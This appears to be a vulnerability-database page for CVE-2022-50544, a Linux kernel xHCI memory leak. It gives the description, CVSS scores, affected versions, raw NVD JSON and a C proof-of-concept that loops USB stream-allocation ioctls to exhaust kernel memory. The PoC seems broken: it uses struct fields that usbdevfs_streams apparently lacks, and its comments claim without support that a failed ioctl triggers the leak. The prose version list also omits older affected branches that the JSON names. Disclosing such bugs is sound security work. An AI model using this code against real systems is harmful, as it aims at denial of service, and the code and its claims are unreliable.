Security Vulnerability Report
CVE-2022-50544 CVSS 5.5 MEDIUM

Published: 2025-10-07 16:15:39
Last Modified: 2026-02-26 23:17:08
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

usb: host: xhci: Fix potential memory leak in xhci_alloc_stream_info()

xhci_alloc_stream_info() allocates stream context array for stream_info->stream_ctx_array with xhci_alloc_stream_ctx(). When some error occurs, stream_info->stream_ctx_array is not released, which will lead to a memory leak.

We can fix it by releasing the stream_info->stream_ctx_array with xhci_free_stream_ctx() on the error path to avoid the potential memory leak.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
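Linux Kernel < 5.10.150 (fixed in the stable branch)
Linux Kernel < 5.15.75 (fixed in the stable branch)
Linux Kernel < 5.19.17 (fixed in the stable branch)
Linux Kernel < 6.0.3 (fixed in the stable branch)
All Linux kernel versions from the introduction of the xhci_alloc_stream_info() function up to the fixed versions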

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// PoC for CVE-2022-50544: Trigger memory leak in xhci_alloc_stream_info()
// This PoC demonstrates how to trigger the memory leak by repeatedly
// attempting to allocate USB streams and forcing error conditions.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <linux/usbdevice_fs.h>

// Simplified trigger: open a USB device and attempt stream allocation
// operations that may fail, causing the memory leak path to be exercised.
int trigger_memory_leak(const char *usb_device_path) {
    int fd;
    int ret;
    int iteration = 0;

    fd = open(usb_device_path, O_RDWR);
    if (fd < 0) {
        perror("Failed to open USB device");
        return -1;
    }

    // Repeatedly attempt operations that trigger xhci_alloc_stream_info()
    // In a real exploit, the attacker would need to:
    // 1. Have a USB device that supports bulk streams
    // 2. Issue USBDEVFS_ALLOCSTREAM or equivalent ioctl calls
    // 3. Force failures in the allocation path (e.g., via resource exhaustion)
    while (iteration < 1000) {
        struct usbdevfs_streams streams;

        // Attempt to allocate streams - this calls into xhci_alloc_stream_info()
        streams.urb_count = 1; // Minimal stream count
        streams.streams = 0;

        ret = ioctl(fd, USBDEVFS_ALLOCSTREAMS, &streams);
        if (ret < 0 && errno != EBUSY) {
            // Error path triggered - memory leak occurs here
            fprintf(stderr, "Iteration %d: ioctl failed (expected for PoC): %s\n",
                    iteration, strerror(errno));
        }
        iteration++;
    }

    close(fd);
    printf("PoC completed. Check kernel memory usage for leaks.\n");
    return 0;
}

int main(int argc, char *argv[]) {
    const char *dev_path = "/dev/bus/usb/001/001";

    if (argc > 1) {
        dev_path = argv[1];
    }

    printf("CVE-2022-50544 PoC - xhci memory leak trigger\n");
    printf("Target device: %s\n", dev_path);
    printf("WARNING: Run as root with a USB device that supports bulk streams\n\n");

    return trigger_memory_leak(dev_path);
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50544", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:38.823", "lastModified": "2026-02-26T23:17:08.363", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: host: xhci: Fix potential memory leak in xhci_alloc_stream_info()\n\nxhci_alloc_stream_info() allocates stream context array for stream_info\n->stream_ctx_array with xhci_alloc_stream_ctx(). When some error occurs,\nstream_info->stream_ctx_array is not released, which will lead to a\nmemory leak.\n\nWe can fix it by releasing the stream_info->stream_ctx_array with\nxhci_free_stream_ctx() on the error path to avoid the potential memory\nleak."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.35", "versionEndExcluding": "4.9.331", "matchCriteriaId": "D68E43FC-1611-40E9-9B72-C951CB0E0707"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.10", "versionEndExcluding": "4.14.296", "matchCriteriaId": "1927ABC6-E0D2-478F-B103-B982A42D1158"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", 
"versionStartIncluding": "4.15", "versionEndExcluding": "4.19.262", "matchCriteriaId": "D6B62970-1FAD-4ED6-930A-23E26A8D2E08"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.220", "matchCriteriaId": "125F7133-B3B7-4175-8CF3-FF0845483254"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.150", "matchCriteriaId": "C495821C-2A71-4F09-BED8-6A6EB4C9BA27"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.75", "matchCriteriaId": "6D945F46-F32F-4C09-8400-C3477E22A9FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.17", "matchCriteriaId": "19B4C3A4-E5C3-41DC-BB14-BE72858E7D35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/782c873f8e7686f5b3c47e8b099f7e08c3dd1fdc", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7e271f42a5cc3768cd2622b929ba66859ae21f97", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7fc6bab3413e6a42bb1264ff7c9149808c93a4c7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/91271a3e772e180bbb8afb114c72fd294a02f93d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9fa81cbd2dd300aa8fe9bac70e068b9a11cbb144", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": 
"https://git.kernel.org/stable/c/a40ad475236022f3432880e3091c380e46e71a71", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ddab9fe76296840aad686c66888a9c1dfdbff5ff", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e702de2f5c893bf2cdb0152191f99a6ad1411823", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/fcd594da0b5955119d9707e4e0a8d0fb1c969101", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}